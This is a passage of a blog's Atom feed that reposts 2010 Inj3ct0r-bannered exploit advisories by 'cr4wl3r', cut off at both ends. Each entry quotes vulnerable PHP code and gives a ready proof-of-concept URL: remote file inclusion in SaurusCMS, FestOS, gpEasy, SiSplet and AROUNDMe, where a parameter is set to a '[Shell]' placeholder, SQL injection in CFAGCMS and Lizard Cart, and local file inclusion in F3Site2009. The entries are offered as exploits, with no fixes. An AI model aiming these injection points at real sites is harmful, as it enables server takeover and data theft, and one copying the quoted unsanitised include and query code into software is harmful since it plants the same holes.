Code [class.writeexcel_workbook.inc.php]&lt;br /&gt;&lt;br /&gt;global $class_path;&lt;br /&gt;&lt;br /&gt;require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";&lt;br /&gt;require_once $class_path."excel/class.writeexcel_format.inc.php";&lt;br /&gt;//require_once "class.writeexcel_formula.inc.php";&lt;br /&gt;require_once $class_path."excel/class.writeexcel_olewriter.inc.php";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ PoC&lt;br /&gt;&lt;br /&gt;[SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ Code [class.writeexcel_worksheet.inc.php]&lt;br /&gt;&lt;br /&gt;global $class_path;&lt;br /&gt;require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ PoC&lt;br /&gt;&lt;br /&gt;[SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-700203407911835660?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/700203407911835660/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/sauruscms-464-multiple-rfi-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/700203407911835660'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/700203407911835660'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/sauruscms-464-multiple-rfi-exploit.html' title='SaurusCMS &lt;= 4.6.4 Multiple RFI Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8404762332080743284</id><published>2010-03-04T10:09:00.001-08:00</published><updated>2010-03-04T10:09:28.945-08:00</updated><title type='text'>CFAGCMS SQL Injection Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ Code [right.php]&lt;br /&gt;&lt;br /&gt;$title  = $_GET['title'];&lt;br /&gt;$query  = "SELECT * FROM pages WHERE title = '".$title."'";&lt;br /&gt;$result = mysql_query($query);&lt;br /&gt;&lt;br /&gt;~ PoC&lt;br /&gt;&lt;br /&gt;[cfagcms_path]/right.php?title=[SQL]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8404762332080743284?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8404762332080743284/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/cfagcms-sql-injection-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8404762332080743284'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8404762332080743284'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/cfagcms-sql-injection-exploit.html' title='CFAGCMS SQL Injection Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3333360097501607883</id><published>2010-03-04T10:08:00.002-08:00</published><updated>2010-03-04T10:09:01.233-08:00</updated><title type='text'>Lizard Cart Multiple SQL Injection Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ Code [detail.php]&lt;br /&gt;&lt;br /&gt;$dbResult = mysql_query("select * from products where id='$id'");&lt;br /&gt;&lt;br /&gt;~ PoC&lt;br /&gt;&lt;br /&gt;[lizardcart_path]/detail.php?id=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ Code [pages.php]&lt;br /&gt;&lt;br /&gt;$dbResult = mysql_query("select * from pages where id='$id'");&lt;br /&gt;&lt;br /&gt;~ PoC&lt;br /&gt;&lt;br /&gt;[lizardcart_path]/pages.php?id=[SQL]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3333360097501607883?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3333360097501607883/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/lizard-cart-multiple-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3333360097501607883'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3333360097501607883'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/lizard-cart-multiple-sql-injection.html' title='Lizard Cart Multiple SQL Injection Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1370846923161754263</id><published>2010-03-04T10:08:00.001-08:00</published><updated>2010-03-04T10:08:34.332-08:00</updated><title type='text'>FestOs &lt;= 2.2.1 Multiple RFI Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ Code : [reports_placement.php]&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;$title = "Jury Sheet Report";&lt;br /&gt;&lt;br /&gt;require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');&lt;br /&gt;if($_SESSION["roleID"] &gt; $reports) {&lt;br /&gt;  header("Location:index.php");&lt;br /&gt;}&lt;br /&gt;include "includes/reportheader.php";&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ Code : [FestOS.php]&lt;br /&gt;&lt;br /&gt;require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ Code : [reportheader.php]&lt;br /&gt;&lt;br /&gt;require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;and more...&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1370846923161754263?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1370846923161754263/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/festos-221-multiple-rfi-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1370846923161754263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1370846923161754263'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/festos-221-multiple-rfi-exploit.html' title='FestOs &lt;= 2.2.1 Multiple RFI Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5473177772677453362</id><published>2010-03-04T10:07:00.001-08:00</published><updated>2010-03-04T10:07:57.944-08:00</updated><title type='text'>gpEasy &lt;= 1.5RC3 Remote FIle Include Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ Code [admin_password.php] :&lt;br /&gt;&lt;br /&gt;require_once($GLOBALS['rootDir'].'/include/admin/admin_users.php');&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[F3Site2009_path]/include/admin/admin_password.php?rootDir=[Shell]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5473177772677453362?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5473177772677453362/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gpeasy-15rc3-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5473177772677453362'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5473177772677453362'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gpeasy-15rc3-remote-file-include.html' title='gpEasy &lt;= 1.5RC3 Remote FIle Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1834755166199159283</id><published>2010-03-04T10:06:00.000-08:00</published><updated>2010-03-04T10:07:17.012-08:00</updated><title type='text'>F3Site2009 Multiple LFI Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ Code [poll.php] :&lt;br /&gt;&lt;br /&gt;if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):&lt;br /&gt;  include('./cache/poll_'.$GLOBALS['nlang'].'.php');&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;~ Code [new.php] :&lt;br /&gt;&lt;br /&gt;if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))&lt;br /&gt;{&lt;br /&gt;   include './cache/new-'.$GLOBALS['nlang'].'.php';&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;~ 3xplo!t :&lt;br /&gt;&lt;br /&gt;[F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1834755166199159283?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1834755166199159283/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/f3site2009-multiple-lfi-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1834755166199159283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1834755166199159283'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/f3site2009-multiple-lfi-exploit.html' title='F3Site2009 Multiple LFI Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6362938136889509063</id><published>2010-03-04T10:05:00.000-08:00</published><updated>2010-03-04T10:06:41.877-08:00</updated><title type='text'>SiSplet CMS &lt;= 2008-01-24 Multiple Remote File Include Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;########################################################################&lt;br /&gt;3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php (line 3)&lt;br /&gt;&lt;br /&gt;      &lt;?php&lt;br /&gt;          require_once($site_path.'main/anketa/class.php');&lt;br /&gt;      ?&gt;&lt;br /&gt;&lt;br /&gt;3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php (line 3)&lt;br /&gt;&lt;br /&gt;      &lt;?php&lt;br /&gt;          require($site_path.'main/forum/class.php');&lt;br /&gt;      ?&gt;&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;PoC  :   http://[target]/[path]/main/anketa/new.php?site_path=[Shell]&lt;br /&gt;        http://[target]/[path]/main/forum/komentar.php?site_path=[Shell]&lt;br /&gt;########################################################################&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6362938136889509063?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6362938136889509063/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/sisplet-cms-2008-01-24-multiple-remote.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6362938136889509063'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6362938136889509063'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/sisplet-cms-2008-01-24-multiple-remote.html' title='SiSplet CMS &lt;= 2008-01-24 Multiple Remote File Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1535210213463832206</id><published>2010-03-04T10:04:00.000-08:00</published><updated>2010-03-04T10:05:49.048-08:00</updated><title type='text'>AROUNDMe &lt;= 1.1 (language_path) Remote File Include Exploit</title><content type='html'>&lt;pre&gt;# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)&lt;br /&gt;&lt;br /&gt;      &lt;?php&lt;br /&gt;          include_once($language_path . 'connect.lang.php');&lt;br /&gt;      ?&gt;&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1535210213463832206?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1535210213463832206/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/aroundme-11-languagepath-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1535210213463832206'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1535210213463832206'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/aroundme-11-languagepath-remote-file.html' title='AROUNDMe &lt;= 1.1 (language_path) Remote File Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1013041026072029149</id><published>2009-12-05T19:28:00.000-08:00</published><updated>2009-12-05T19:30:35.860-08:00</updated><title type='text'>427BB Fourtwosevenbb &lt;= 